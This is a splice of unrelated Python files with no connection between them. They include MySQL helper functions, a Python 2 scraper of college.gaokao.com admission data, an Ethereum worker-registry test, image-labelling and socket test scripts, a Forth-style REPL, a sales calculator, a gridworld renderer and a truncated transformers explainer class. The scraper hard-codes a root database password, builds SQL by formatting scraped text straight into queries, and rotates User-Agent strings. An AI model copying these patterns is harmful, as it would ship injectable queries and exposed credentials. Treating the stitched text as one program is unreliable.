            cursor.execute(base + ' WHERE u.`name` LIKE %s',
                           (userId, '%' + searchStr + '%'))
        results = cursor.fetchall()
        users = []
        data = {}
        for u in results:
            user = {}
            user['id'] = u[0]
            user['name'] = u[1]
            users.append(user)
        data['code'] = 200
        data['users'] = users
        return json.dumps(data)
    except MySQLdb.Error as e:
        print("Mysql Error %d: %s" % (e.args[0], e.args[1]))
        return None
    finally:
        cursor.close()
        conn.close()


def insertData(table=None, L=None):
    """Batch-insert (id, name) rows into `table`; 1 on success, -1 on error."""
    if table is None:
        return None
    if L is None:
        return -1
    # One connection for both executemany and commit (the old code used two).
    conn, cursor = connDB()
    if cursor is None:
        return -1
    try:
        sql = "INSERT INTO " + table + " VALUES (%s,%s)"
        cursor.executemany(sql, L)
        conn.commit()
        return 1
    except MySQLdb.Error as e:
        print("Mysql Error %d: %s" % (e.args[0], e.args[1]))
        return -1
    finally:
        cursor.close()
        conn.close()


def updateData(table=None, L=None):
    """Batch-update names by id; 1 on success, -1 on error (with rollback).

    NOTE(review): the statement hard-codes the `user` table and ignores the
    `table` parameter — kept as-is to preserve existing behaviour.
    """
    if L is None:
        return -1
    conn, cursor = connDB()
    if cursor is None:
        return -1
    try:
        sql = 'UPDATE user SET name = %s where id = %s'
        cursor.executemany(sql, L)
        conn.commit()
        return 1
    except MySQLdb.Error as e:
        print("Mysql Error %d: %s" % (e.args[0], e.args[1]))
        conn.rollback()
        return -1
    finally:
        cursor.close()
        conn.close()


def deleteData(table=None, where=None):
    """Delete rows from `table` (all rows when `where` is None)."""
    if table is None:
        return None
    conn, cursor = connDB()
    if cursor is None:
        return -1
    try:
        if where is None:
            cursor.execute('DELETE FROM ' + table)
        else:
            cursor.execute('DELETE FROM ' + table + ' WHERE id in (%s)',
                           where)
        conn.commit()
        return 1
    except MySQLdb.Error as e:
        print("Mysql Error %d: %s" % (e.args[0], e.args[1]))
        return -1
    finally:
        cursor.close()
        conn.close()


def printAll(results=None):
    """Print id/name for each row in `results` (no-op for None)."""
    if results is not None:
        for row in results:
            id = row[0]
            name = row[1]
            print("id=%s,name=%s," % (id, name))
    return None


def batchInsert(table):
    """Insert 19999 demo rows and report the resulting row count."""
    items = []
    for x in range(1, 20000):
        items.append([str(x), 'Iter笔记' + str(x)])
    items = tuple(items)
    #print (items)
    flag = insertData(table, items)
    if flag == 1:
        print("批量添加数据成功,总共插入:" + str(getCount(table)))
    else:
        print("批量添加数据失败")


def batchUpd(table):
    """Rename two demo rows via updateData and report the outcome."""
    items = (['Iter笔记11', '1'], ['Iter笔记55', '5', ])
    flag = updateData(table, items)
    if flag == 1:
        print("批量修改数据成功")
    else:
        print("批量修改数据失败")


if __name__ == '__main__':
    #connDB()
    table = 'user'
    #print (getCount(table,'ff'))
    #print (select())
    print(select(table, 'ff'))
    #printAll(select(table))
    #batchInsert(table)
    #batchUpd(table)
    #print (deleteData(table,['2']))
    #print (unionSelect('100'))
# -*-coding: utf8 -*-
'''
url = http://college.gaokao.com/school/tinfo/(school code)/result/(province code)/(subject code)/

2666 universities in total.
Province codes run 1-31; Hong Kong is 33, Macao 38, Taiwan 39.
Subject codes: science 1, liberal arts 2, comprehensive 3, other 4,
arts-science 8, arts-liberal-arts 9.

The URLs are generated by iterating over every combination.

NOTE: this is legacy Python 2 code (print statements, reload(sys)).
'''
import requests
import random
import MySQLdb
import time
from lxml import etree
import re
import sys

# Python 2 only: force UTF-8 as the default encoding for the scraped text.
reload(sys)
sys.setdefaultencoding('utf-8')
sys.setrecursionlimit(2000000)


class theAccessNum():
    # Scraper that walks college.gaokao.com admission pages and writes the
    # per-school / per-province admission rows into a local MySQL table.

    def __init__(self):
        # Pool of desktop User-Agent strings; one is picked at random per
        # request so the scraping traffic looks less uniform.
        self.user_agent_list = [ \
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1", \
            "Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11", \
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6", \
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6", \
            "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/19.77.34.5 Safari/537.1", \
            "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5", \
            "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5", \
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3", \
            "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3", \
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3", \
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3", \
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1062.0 Safari/536.3", \
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3", \
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3", \
            "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3", \
            "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.0 Safari/536.3", \
            "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24", \
            "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24"
        ]
        self.session = requests.session()
        # Province codes (1-31 mainland, 33 HK, 38 Macao, 39 Taiwan).
        self.province = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,
                         16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28,
                         29, 30, 31, 33, 38, 39]
        # Subject/category codes (see module docstring).
        self.type = [1, 2, 3, 4, 8, 9]

    def setupsession(self):
        # Warm the HTTP session with the site's cookies, open the MySQL
        # connection, then kick off the full crawl via constructUrl().
        try:
            headers = {
                'Host': 'www.gaokao.com',
                'User-Agent': random.choice(self.user_agent_list),
            }
            r = self.session.get('http://www.gaokao.com', headers=headers)
            cookies = r.cookies
            self.session.cookies.update(cookies)
            # Open the MySQL connection.
            self.conn = MySQLdb.connect(
                host='localhost',
                port=3306,
                user='root',
                passwd='454647',
                db='college_info',
                charset="utf8"
            )
            self.cur = self.conn.cursor()
            self.cur.execute('select count(*) from all_college')
            self.total_school = self.cur.fetchone()[0]
            # Collects URLs whose scrape failed, for later retry/reporting.
            self.urls = []
            return self.constructUrl()
        except:
            print 'set up session 这里错误'

    def constructUrl(self):
        # Iterate every (school, province, subject) combination, scraping each
        # generated URL with a 1-second delay between requests.
        for each_college in range(2666):
            print '第', each_college + 1 ,'所学校'
            for each_province in self.province:
                for each_type in self.type:
                    url = 'http://college.gaokao.com/school/tinfo/'+ str(each_college + 1) \
                          + '/result/' + str(each_province) + '/' + str(each_type) + '/'
                    self.getData(url)
                    time.sleep(1)
            # Commit once per school so a crash loses at most one school.
            self.conn.commit()
        print '抓取完毕'
        self.conn.close()
        print '失效的链接有'
        for wrong_link in self.urls:
            print wrong_link

    def getData(self, url):
        # Fetch one admission page and insert its rows into MySQL.  Any
        # failure (HTTP, parse, SQL) records the URL in self.urls.
        try:
            headers = {
                'Host': 'college.gaokao.com',
                'User-Agent': random.choice(self.user_agent_list),
            }
            selector = etree.HTML(self.session.get(url, headers=headers, timeout=5).content)
            '''
            Keep the school + area + student-category fields separate from the
            score rows.  When a page has no data rows, a record holding just
            school + area + category is still inserted.
            '''
            school_name = selector.xpath('//div[@class="cont_l in"]/p/font[1]/text()')[0]
            area = selector.xpath('//div[@class="cont_l in"]/p/font[2]/text()')[0]
            s_type = selector.xpath('//div[@class="cont_l in"]/p/font[3]/text()')[0]
            print school_name,area,s_type
            if selector.xpath('//div[@class="cont_l in"]/div[@class="ts"]'):
                # No data on this page: insert an "empty" marker row.
                SQL = 'insert into 各校各省录取人数(学校名称,地区,考生类别,是否为空)values(\'%s\',\'%s\',\'%s\',\'%s\')'\
                      % (school_name, area, s_type, 1)
                self.cur.execute(SQL)
            elif selector.xpath('//div[@class="cont_l in"]/div[@id="pointbyarea"]/table/tr'):
                # Data present: scrape every table row; blank cells become ''.
                for each_info in selector.xpath('//div[@class="cont_l in"]/div[@id="pointbyarea"]/table/tr'):
                    if each_info.xpath('td[1]/text()'):
                        year = each_info.xpath('td[1]/text()')[0]
                    else:
                        year = ''
                    if each_info.xpath('td[2]/text()'):
                        min = each_info.xpath('td[2]/text()')[0]
                    else:
                        min = ''
                    if each_info.xpath('td[3]/text()'):
                        max = each_info.xpath('td[3]/text()')[0]
                    else:
                        max = ''
                    if each_info.xpath('td[4]/text()'):
                        ave = each_info.xpath('td[4]/text()')[0]
                    else:
                        ave = ''
                    if each_info.xpath('td[5]/text()'):
                        num = each_info.xpath('td[5]/text()')[0]
                    else:
                        num = ''
                    if each_info.xpath('td[6]/text()'):
                        admission_type = each_info.xpath('td[6]/text()')[0]
                    else:
                        admission_type = ''
                    # Rows without a year are header/placeholder rows — skip.
                    if year != '':
                        SQL = 'insert into 各校各省录取人数(学校名称,地区,考生类别,年份,最低,最高,平均,录取人数,录取批次,是否为空)' \
                              'value(\'%s\',\'%s\',\'%s\',\'%s\',\'%s\',\'%s\',\'%s\',\'%s\',\'%s\',\'%s\')' \
                              % (school_name, area, s_type, year, min, max, ave, num, admission_type, 0)
                        self.cur.execute(SQL)
        except:
            print 'error,', url
            self.urls.append(url)

    def ex(self):
        # Retry helper: re-reads the 'demo' log for previously failed URLs.
        # (The actual re-scrape lines are commented out — currently it only
        # prints the URLs that would be retried.)
        headers = {
            'Host': 'www.gaokao.com',
            'User-Agent': random.choice(self.user_agent_list),
        }
        r = self.session.get('http://www.gaokao.com', headers=headers)
        cookies = r.cookies
        self.session.cookies.update(cookies)
        # Open the MySQL connection.
        self.conn = MySQLdb.connect(
            host='localhost',
            port=3306,
            user='root',
            passwd='454647',
            db='college_info',
            charset="utf8"
        )
        self.cur = self.conn.cursor()
        self.urls = []
        text = open('demo').read()
        lists = re.findall('error, http://college.gaokao.com/school/tinfo/(.*?)\n', text, re.S)
        for i in lists:
            url = 'http://college.gaokao.com/school/tinfo/' + str(i)
            print url
            # self.getData(url)
            # time.sleep(1)
        print '仍然无效的链接'
        for p in self.urls:
            print p


if __name__ == '__main__':
    c =theAccessNum()
    # c.setupsession()
    c.ex()
# Copyright 2020 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from os import urandom, path, environ
import errno
import logging
import toml
import json
import unittest
from web3 import Web3
from avalon_connector_sdk.ethereum.ethereum_worker_registry_list_connector \
    import EthereumWorkerRegistryListConnectorImpl
from avalon_client_sdk.utility.tcf_types import RegistryStatus
from utility.hex_utils import hex_to_utf8, pretty_ids

logging.basicConfig(
    format="%(asctime)s - %(levelname)s - %(message)s", level=logging.INFO)


class TestEthereumWorkerRegistryConnector(unittest.TestCase):
    """Exercises the Ethereum worker-registry-list connector end to end.

    NOTE(review): despite subclassing unittest.TestCase, the tests are driven
    manually from main() and MUST run in order — test_registry_update and
    test_registry_set_status reuse the org id / smart-contract address
    created inside test_registry_add.
    """

    def __init__(self, config_file):
        """Load the TOML connector config and build the Ethereum connector.

        Raises FileNotFoundError when config_file does not exist.
        """
        super(TestEthereumWorkerRegistryConnector, self).__init__()
        if not path.isfile(config_file):
            raise FileNotFoundError("File not found at path: {0}".format(
                path.realpath(config_file)))
        try:
            with open(config_file) as fd:
                self.__config = toml.load(fd)
        except IOError as e:
            # Existence was checked above, so ENOENT is deliberately ignored.
            if e.errno != errno.ENOENT:
                raise Exception("Could not open config file: %s", e)
        self.__eth_conn = EthereumWorkerRegistryListConnectorImpl(
            self.__config)

    def test_registry_add(self):
        """Register a fresh random org id and assert the 'added' status."""
        self.__org_id = urandom(32)
        self.__uri = "http://127.0.0.1:1947"
        self.__sc_addr = urandom(32)
        self.__app_type_ids = [urandom(32), urandom(32)]
        logging.info(
            'Calling registry_add contract..\n org_id: %s\n ' +
            'uri: %s\n ' +
            'sc_addr: %s\n application_ids: %s',
            hex_to_utf8(self.__org_id), self.__uri,
            hex_to_utf8(self.__sc_addr),
            pretty_ids(self.__app_type_ids))
        result = self.__eth_conn.registry_add(
            self.__org_id, self.__uri, self.__sc_addr,
            self.__app_type_ids)
        logging.info(
            "registry_add contract status \n{'status': %s', \n" +
            "'txn_receipt': %s}", result["status"],
            json.dumps(
                json.loads(Web3.toJSON(result["txn_receipt"])), indent=4))
        self.assertEqual(
            result['status'], 'added',
            "Registry add response not matched")

    def test_registry_update(self):
        """Update the registry entry created by test_registry_add."""
        self.__new_app_id = [urandom(32)]
        self.__new_uri = 'http://localhost:1947'
        logging.info(
            'Calling registry_update contract..\n org_id: %s\n uri: %s\n ' +
            'sc_addr: %s\n application_ids: %s',
            hex_to_utf8(self.__org_id), self.__new_uri,
            hex_to_utf8(self.__sc_addr), pretty_ids(self.__new_app_id))
        result = self.__eth_conn.registry_update(
            self.__org_id, self.__new_uri, self.__sc_addr,
            self.__new_app_id)
        logging.info(
            "registry_update contract status \n{'status': %s', \n" +
            "'txn_receipt': %s}", result["status"],
            json.dumps(
                json.loads(Web3.toJSON(result["txn_receipt"])), indent=4))
        # NOTE(review): the expected status here is 'added', same as for the
        # add test — confirm the SDK really reports 'added' for updates too.
        self.assertEqual(
            result['status'], 'added',
            "Registry update response not matched")

    def test_registry_set_status(self):
        """Set the registry entry's status to OFF_LINE."""
        self.__new_status = RegistryStatus.OFF_LINE
        logging.info(
            'Calling registry_set_status contract..\n org_id: %s\n status: %d',
            hex_to_utf8(self.__org_id), self.__new_status.value)
        result = self.__eth_conn.registry_set_status(
            self.__org_id, self.__new_status)
        logging.info(
            "registry_set_status contract status \n{'status': %s', \n" +
            "'txn_receipt': %s}", result["status"],
            json.dumps(json.loads(Web3.toJSON(result["txn_receipt"])),
                       indent=4))
        # NOTE(review): same 'added' expectation as above — verify against SDK.
        self.assertEqual(
            result['status'], 'added',
            "Registry set status response not matched")


def main():
    """Run the three registry tests in their required order."""
    logging.info("Running test cases...")
    tcf_home = environ.get("TCF_HOME", "../../")
    test = TestEthereumWorkerRegistryConnector(
        tcf_home + "/client_sdk/avalon_client_sdk/" +
        "tcf_connector.toml")
    test.test_registry_add()
    test.test_registry_update()
    test.test_registry_set_status()


if __name__ == "__main__":
    main()
"""Walk the pneumonia image tree and regenerate labels.csv.

Each *.jpeg file contributes one "id,clase" row, where the id is the file
name without extension and the class is the part of the name before the
first '-'.

Fixes over the previous revision:
* The stale-file guard deleted /home/jyosa/melanoma/labels.csv while the
  script wrote ./labels.csv — it now guards the file it actually writes.
* The CSV is opened in 'w' (not 'a+') mode, so re-running the script no
  longer duplicates the header and all rows.
* The id/class are derived from the file's basename instead of
  f.split('/')[1], which broke for images in nested subdirectories.
"""
import glob
import numpy as np
import os
import shutil

# Write labels.csv next to the current working directory.
save_path = os.path.join(os.getcwd(), 'labels.csv')

# Remove any stale labels file before regenerating it.
if os.path.exists(save_path):
    os.remove(save_path)
else:
    print("Can not delete the file as it doesn't exists")

path = 'pneumonia/'

with open(save_path, 'w') as data_file:
    files = []
    # r=root, d=directories, f = files
    for r, d, f in os.walk(path):
        for file in f:
            if '.jpeg' in file:
                files.append(os.path.join(r, file))

    data_file.write("id,clase")
    for f in files:
        base = os.path.basename(f)          # robust to nested directories
        id_img = base.split('.')[0].strip()  # filename without extension
        clase = base.split('-')[0].strip()   # class prefix before first '-'
        print(clase)
        data_file.write("\n{},{}".format(id_img, clase))
import argparse
import configparser
import socket

from federatedrc import network


class TestModelSender:
    """One-shot test harness: accept a client and send it a model file."""

    def __init__(self):
        self.configure()

    def configure(self):
        """Read server ip/port/model filename from the INI file given on the CLI."""
        parser = argparse.ArgumentParser(
            description='Test Model Transfer Sender Configuration')
        parser.add_argument('config', nargs=1, help='config file name')
        args = parser.parse_args()

        config = configparser.ConfigParser()
        config.read(args.config)
        self.server_ip = config['Test Config']['SERVER_IP']
        self.port = int(config['Test Config']['PORT'])
        self.model_fname = config['Test Config']['MODEL_FILE_NAME']

    def test_model_send(self):
        """Listen on (server_ip, port), accept one client, send the model.

        The listening socket and the accepted connection are now closed on
        every exit path (the previous revision leaked both).
        """
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            # Non-blocking accept loop — presumably deliberate so the process
            # stays interruptible; a blocking accept() would also work here.
            s.setblocking(False)
            s.bind((self.server_ip, self.port))
            s.listen()

            while True:
                try:
                    client_conn, client_addr = s.accept()
                    break
                except BlockingIOError:
                    continue

            try:
                network.send_model_file(self.model_fname, client_conn)
            finally:
                client_conn.close()
        print('Model Transferred Successfully')


if __name__ == '__main__':
    TestModelSender().test_model_send()
""" repl.py - top level read/eval/print loop. INTRO 1 : This is where ActorForth all begins for execution purposes. """ import sys from continuation import Continuation, Stack from interpret import interpret from af_types.af_any import print_words def print_stack_stats(stack): print("") print(stack.contents()) print("Stack max_depth = %s" % stack.max_depth()) print("Stack depth_history = %s" % stack.depth_history()) print("Stack total operations = %s" % stack.total_operations()) if __name__ == "__main__": print("ActorForth demo interpreter. ^C to exit.") print_words() """ INTRO 1.1 : Input always comes from a file whether that's the default stdin or a filename passed to the system. """ handle = sys.stdin filename = "stdin" if len(sys.argv) >= 2: filename = sys.argv[1] handle = open(filename) print("Interpreting file: '%s'." % sys.argv[1]) """ INTRO 1.2 : Establish our stack and build our stateful Continutaion from it. """ stack = Stack() cont = Continuation(stack) while True: """ INTRO 1.3 : Continuously call the Interpreter until ^C is hit, the input file runs out of tokens to parse, or an exception is encountered. TODO: Likely probably want exceptions to just reset the stack/Continuation and resume. """ try: cont = interpret(cont, handle, filename, prompt="ok: ") """ INTRO 1.4 : If the last token in the input file is 'resume' then we re-establish stdin as our input file and continue at the repl with everything intact. This is a special hard-coded command. TODO: How to do this in a more forth-like manner? INTRO 1.5 : Continue in interpret.py for INTRO stage 2. """ if cont.stack.tos().value == "resume": handle = sys.stdin filename = "stdin" cont.stack.pop() print_stack_stats(cont.stack) else: break except KeyboardInterrupt as x: print(" key interrupt.") break except Exception as x: print( x ) raise print_stack_stats(cont.stack) print("\nend of line...")
# Quantities each of the three sellers sold, in product order [A, B, C, D, E],
# and the unit price of each product.
seller_1 = [33, 32, 56, 45, 33]
seller_2 = [77, 33, 68, 45, 23]
seller_3 = [43, 55, 43, 67, 65]

product_A = 12
product_B = 16
product_C = 10
product_D = 14
product_E = 15


def Total_sales(A, B, C, D, E):
    """Return each seller's revenue as a (seller1, seller2, seller3) tuple."""
    prices = (A, B, C, D, E)
    return tuple(
        sum(qty * price for qty, price in zip(quantities, prices))
        for quantities in (seller_1, seller_2, seller_3)
    )


print('第1位銷售員的銷售總額為 : %d 元 \n第2位銷售員的銷售總額為 : %d 元 \n第3位銷售員的銷售總額為 : %d 元' %(Total_sales(product_A,product_B,product_C,product_D,product_E)))


def Total_product_sales(A, B, C, D, E):
    """Return each product's revenue summed over all three sellers."""
    prices = (A, B, C, D, E)
    return tuple(
        (q1 + q2 + q3) * price
        for q1, q2, q3, price in zip(seller_1, seller_2, seller_3, prices)
    )


print('第1項產品的銷售總額為 : %d 元 \n第2項產品的銷售總額為 : %d 元 \n第3項產品的銷售總額為 : %d 元 \n第4項產品的銷售總額為 : %d 元 \n第5項產品的銷售總額為 : %d 元' %(Total_product_sales(product_A,product_B,product_C,product_D,product_E)))


def High_sales_seller(A, B, C, D, E):
    """Return the 1-based index of the top seller (the last one wins ties)."""
    totals = Total_sales(A, B, C, D, E)
    # max() over (value, position) pairs: equal values resolve to the larger
    # position, matching the original ">=" scan's last-wins tie behaviour.
    return max((value, pos) for pos, value in enumerate(totals, 1))[1]


print('有最好業績的銷售員是第 %d 位銷售員' %(High_sales_seller(product_A,product_B,product_C,product_D,product_E)))


def High_sales_product(A, B, C, D, E):
    """Return the 1-based index of the top-grossing product (last wins ties)."""
    totals = Total_product_sales(A, B, C, D, E)
    return max((value, pos) for pos, value in enumerate(totals, 1))[1]


print('銷售總金額為最多的產品是第 %d 個產品' %(High_sales_product(product_A,product_B,product_C,product_D,product_E)))
import tkinter as tk


def max_reward(terminal_states):
    """Return the largest reward among the terminal states.

    Each terminal state is a sequence whose third item (index 2) is its
    reward value.
    """
    max_reward = float('-inf')
    for state in terminal_states:
        if state[2] > max_reward:
            max_reward = state[2]
    return max_reward


def max_punishment(terminal_states):
    """Return the smallest (most negative) reward among the terminal states."""
    max_punishment = float('inf')
    for state in terminal_states:
        if state[2] < max_punishment:
            max_punishment = state[2]
    return max_punishment


def draw_board(window, grid, terminal, boulders, max_reward, max_punishment, iterations):
    """Render the value-iteration grid onto a tkinter canvas inside `window`.

    grid[row][col] is a list of (q_value, direction) pairs; `terminal` and
    `boulders` are lists of [row, col] cells.

    NOTE(review): the parameters ``max_reward``/``max_punishment`` shadow the
    module-level functions of the same name — callers are expected to pass
    the already-computed numeric extremes.
    """
    canvas_width = 1000  # Width of the window
    canvas_height = 600  # Length of the window
    edge_dist = 10  # Distance of the board to the edge of the window
    bottom_space = 100  # Distance from the bottom of the board to the bottom of the window
    small_rect_diff = 10  # For terminal states, distance from outside rectangle to inside rectangle
    rows = len(grid)  # Number of rows in the grid
    cols = len(grid[0])  # Number of columns in the grid
    edge_dist_triangle = 5  # Distance from tip of the triangle to the edge of the rectangle
    triangle_height = int(0.1 * min(((canvas_width - 2 * edge_dist) / cols), ((canvas_height - edge_dist - bottom_space) / rows)))  # Height of the triangles
    triangle_width = 2 * triangle_height  # Width of the triangles
    canvas = tk.Canvas(window, width=canvas_width, height=canvas_height, background='black')  # Create a black background
    for row in range(rows - 1, -1, -1):  # Loop through the rows of the grid
        for col in range(cols):  # Loop through the columns of the grid
            #print(row, col)
            if [row, col] not in boulders:  # If it's not a boulder state
                x1 = edge_dist + col * ((canvas_width - 2 * edge_dist) / cols)  # Top left x coordinate of the rectangle
                y1 = edge_dist + (rows - row - 1) * ((canvas_height - edge_dist - bottom_space) / rows)  # Top left y coordinate of the rectangle
                #print(x1, y1)
                x2 = x1 + ((canvas_width - 2 * edge_dist) / cols)  # Bottom right x coordinate of the rectangle
                y2 = y1 + ((canvas_height - edge_dist - bottom_space) / rows)  # Bottom right y coordinate of the rectangle
                best_move = get_best_move(grid[row][col])  # Get the index of the maximum q-value for this cell
                best_value = grid[row][col][best_move][0]  # Get the best q-value for this cell
                best_direction = grid[row][col][best_move][1]  # Get the best direction out of this cell
                if best_value >= 0:  # Best value is positive, so draw the rectangle in green
                    # NOTE(review): min(best_value / max_reward, max_reward) looks like it
                    # was meant to clamp the colour ratio to 1 — confirm intended shading.
                    canvas.create_rectangle(x1, y1, x2, y2, outline='white', fill='#%02x%02x%02x' % (0, int(200 * min(best_value / max_reward, max_reward)), 0))  # Draw the rectangle of this cell
                else:  # Best value is negative, so draw the rectangle in red
                    canvas.create_rectangle(x1, y1, x2, y2, outline='white', fill='#%02x%02x%02x' % (int(200 * min(best_value / max_punishment, -1 * max_punishment)), 0, 0))  # Draw the rectangle of this cell
                canvas.create_text((x1 + x2) / 2, (y1 + y2) / 2, text=str(round(best_value, 2)), font=('TkDefaultFont', int(0.2 * ((canvas_width - 2 * edge_dist) / cols))), fill='white')  # Print the best value in the middle of the cell
                if [row, col] in terminal:  # If this cell is a terminal state
                    #print("TERMINAL: ", row, col)
                    x1 = x1 + small_rect_diff
                    y1 = y1 + small_rect_diff
                    x2 = x2 - small_rect_diff
                    y2 = y2 - small_rect_diff
                    canvas.create_rectangle(x1, y1, x2, y2, outline='white')  # Draw a smaller rectangle inside
                else:  # Not a terminal state, so draw an arrow in the direction of the highest q-value
                    if best_direction == '↑':  # Draw an up arrow
                        mid = (x1 + x2) / 2
                        top = y1 + edge_dist_triangle
                        triange_points = [mid, top, mid - triangle_width / 2, top + triangle_height, mid + triangle_width / 2, top + triangle_height]
                        canvas.create_polygon(triange_points, fill='white')
                    elif best_direction == '↓':  # Draw a down arrow
                        mid = (x1 + x2) / 2
                        top = y2 - edge_dist_triangle
                        triange_points = [mid, top, mid - triangle_width / 2, top - triangle_height, mid + triangle_width / 2, top - triangle_height]
                        canvas.create_polygon(triange_points, fill='white')
                    elif best_direction == '←':  # Draw a left arrow
                        mid = (y1 + y2) / 2
                        top = x1 + edge_dist_triangle
                        triange_points = [top, mid, top + triangle_height, mid - triangle_width / 2, top + triangle_height, mid + triangle_width / 2]
                        canvas.create_polygon(triange_points, fill='white')
                    elif best_direction == '→':  # Draw a right arrow
                        mid = (y1 + y2) / 2
                        top = x2 - edge_dist_triangle
                        triange_points = [top, mid, top - triangle_height, mid - triangle_width / 2, top - triangle_height, mid + triangle_width / 2]
                        canvas.create_polygon(triange_points, fill='white')
            else:  # This is a boulder state
                x1 = edge_dist + col * ((canvas_width - 2 * edge_dist) / cols)
                y1 = edge_dist + (rows - row - 1) * ((canvas_height - edge_dist - bottom_space) / rows)
                x2 = x1 + ((canvas_width - 2 * edge_dist) / cols)
                y2 = y1 + ((canvas_height - edge_dist - bottom_space) / rows)
                canvas.create_rectangle(x1, y1, x2, y2, fill='grey', outline='white')
    canvas.create_text(int(canvas_width / 2), canvas_height - bottom_space / 2, font=('TkDefaultFont', int(bottom_space / 2.5)), text=('VALUE AFTER ' + str(iterations) + ' ITERATIONS'), fill='white')  # Write text at the bottom of the canvas
    canvas.pack()


def get_best_move(state):
    """Return the index of the (q_value, direction) pair with the highest value."""
    max_value = float('-inf')
    max_index = -1
    for move in range(len(state)):
        if state[move][0] > max_value:
            max_index = move
            max_value = state[move][0]
    return max_index
import warnings

import captum
import torch
from captum.attr import visualization as viz
from transformers import PreTrainedModel, PreTrainedTokenizer

from transformers_interpret import BaseExplainer, LIGAttributions
from transformers_interpret.errors import (
    AttributionTypeNotSupportedError,
    InputIdsNotCalculatedError,
)

# Attribution algorithms this explainer knows how to run.
SUPPORTED_ATTRIBUTION_TYPES: list = ["lig"]


class SequenceClassificationExplainer(BaseExplainer):
    """
    Explainer for explaining attributions for models of type
    `{MODEL_NAME}ForSequenceClassification` from the Transformers package.
    """

    def __init__(
        self,
        text: str,
        model: PreTrainedModel,
        tokenizer: PreTrainedTokenizer,
        attribution_type: str = "lig",
    ):
        """
        :param text: text to explain
        :param model: a `*ForSequenceClassification` transformers model
        :param tokenizer: tokenizer matching *model*
        :param attribution_type: attribution algorithm; only "lig"
            (Layer Integrated Gradients) is currently supported
        :raises AttributionTypeNotSupportedError: for unknown attribution types
        """
        super().__init__(text, model, tokenizer)
        if attribution_type not in SUPPORTED_ATTRIBUTION_TYPES:
            raise AttributionTypeNotSupportedError(
                f"""Attribution type '{attribution_type}' is not supported.
                Supported types are {SUPPORTED_ATTRIBUTION_TYPES}"""
            )
        self.attribution_type = attribution_type

        # Label <-> id mappings come straight from the model config.
        self.label2id = model.config.label2id
        self.id2label = model.config.id2label

        self.attributions = None  # populated by run()/_calculate_attributions()
        self.input_ids = None     # populated by _calculate_attributions()

    def encode(self, text: str = None) -> list:
        """Tokenize *text* (default: self.text) to ids, without special tokens."""
        if text is None:
            text = self.text
        return self.tokenizer.encode(text, add_special_tokens=False)

    def decode(self, input_ids) -> list:
        """Map a batch of input ids (first row) back to token strings."""
        return self.tokenizer.convert_ids_to_tokens(input_ids[0])

    def run(self, text: str = None, index: int = None, class_name: str = None):
        """Calculate and return attributions, optionally for new *text*.

        :param index: explain this class index (overrides *class_name*)
        :param class_name: explain this class by label name
        """
        if text is not None:
            self.text = text
        self._calculate_attributions(index=index, class_name=class_name)
        return self.attributions

    def _forward(self, input_ids):
        """Forward function for captum: P(selected class) as a 1-element tensor."""
        preds = self.model(input_ids)[0]
        # NOTE(review): this caches the probability of class 1 regardless of
        # `selected_index` — confirm whether it should be
        # `[0][self.selected_index]` instead.
        self.pred_probs = torch.softmax(preds, dim=1)[0][1]
        return torch.softmax(preds, dim=1)[0][self.selected_index].unsqueeze(-1)

    @property
    def predicted_class_index(self):
        """Index of the model's highest-probability class for `self.input_ids`.

        :raises InputIdsNotCalculatedError: when run() has not been called yet.
        """
        if self.input_ids is None:
            # Message fixed: the public entry point is `run()`, there is no
            # `get_attributions()` method on this class.
            raise InputIdsNotCalculatedError(
                "input_ids have not been created yet. Please call `run()`"
            )
        preds = self.model(self.input_ids)[0]
        # Bug fix: the cached class index used softmax over dim=0 (the batch
        # axis of a (1, num_labels) logits tensor), which yields all ones and
